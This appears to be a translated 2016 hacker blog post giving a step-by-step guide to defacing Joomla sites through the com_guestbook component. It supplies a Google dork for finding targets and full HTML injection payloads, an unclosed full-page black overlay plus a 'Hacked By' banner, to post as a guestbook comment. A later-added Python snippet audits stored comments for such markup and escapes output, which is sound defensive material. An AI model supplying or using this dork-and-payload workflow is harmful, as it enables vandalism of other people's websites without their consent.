Deface Com_Guestbook Arbitrary Code Injection

Friday, September 16, 2016

This time I, Yukinoshita 47, want to share a PoC that came out of research by the master, E7B_404. He used my malicious script as material for his research :v


OK, this time it's defacing a Joomla site that uses the GuestBook component.

You're done jerking off, right? :D OK, let's go straight to the next step :v



The dork: inurl:option=com_guestbook

Exploitation : situs.co.li/[path-CMS]/index.php?option=com_guestbook
                        situs.co.li/index.php?option=com_guestbook

Next, do the dorking first :v

Found one? OK, first of all:

Click Add Comment

Fill in the Your Name, Your Email, URL and Title fields with anything, then put the malicious script + your deface script in the comment field.

My malicious script [ way cooler than JS Overlay :p ]

<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center> 

My deface script:

<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br>  

So it becomes:


<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center>
<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br> 

as in the picture below


Once that's done, click Save Comment, as in the picture below:


If it shows up like this, it worked, yay :D


Hahaha, really easy, right? :D

If you use this Joomla guestbook component, update to the latest version right away so you don't get defaced :v
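
For site owners, an added example (not from the original post or from the component's code): it audits stored guestbook comments for the kind of markup shown above, a positioned layer left unclosed so it covers the page, and shows the output encoding that makes such a comment display as plain text. The row layout, finding names and sample comments are assumptions made up for the illustration.

```python
# Added example: row layout, finding names and sample comments are constructed.
import html
import re
from collections import Counter
from html.parser import HTMLParser

VOID = {"br", "img", "hr", "input", "meta", "link"}   # elements with no end tag
OVERLAY = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)
class MarkupAudit(HTMLParser):
    """Collects signals that should never appear in a plain-text comment."""
    def __init__(self):
        super().__init__()
        self.open_tags = Counter()   # elements opened but not yet closed
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        self.findings.add("html-tag")
        if tag not in VOID:
            self.open_tags[tag] += 1
        for name, value in attrs:
            if name == "style" and OVERLAY.search(value or ""):
                self.findings.add("positioned-overlay")
            if name in ("src", "href") and re.match(r"(https?:)?//", value or "", re.I):
                self.findings.add("remote-resource")

    def handle_endtag(self, tag):
        if self.open_tags[tag] > 0:
            self.open_tags[tag] -= 1

def audit_comment(text):
    """Return a sorted list of findings for one stored comment body."""
    parser = MarkupAudit()
    parser.feed(text)
    parser.close()
    if any(parser.open_tags.values()):
        parser.findings.add("unclosed-element")   # can swallow the rest of the page
    return sorted(parser.findings)

def render_comment(text):
    """Output-encode the comment so any markup displays as literal text."""
    return html.escape(text, quote=True)

# Constructed sample rows: (id, comment body).
ROWS = [
    (1, "Great site, thanks for the photos!"),
    (2, '<div style="position: absolute; top: 0px; left: 0px; width: 2350px">'
        '<center><b>x</b><img src="http://example.invalid/a.jpg">'),
]
FLAGGED = {rid: audit_comment(body) for rid, body in ROWS if audit_comment(body)}
```

Rows that land in FLAGGED are candidates for review and removal; encoding on output is what keeps any comment that slips through from changing the page.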



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | Heruu Dot ID | And All Member of Garuda Security Hacker

I'm a simple, ordinary person, nothing more.


3 comments:

How beautifully all the feelings have been conveyed through writing.
click now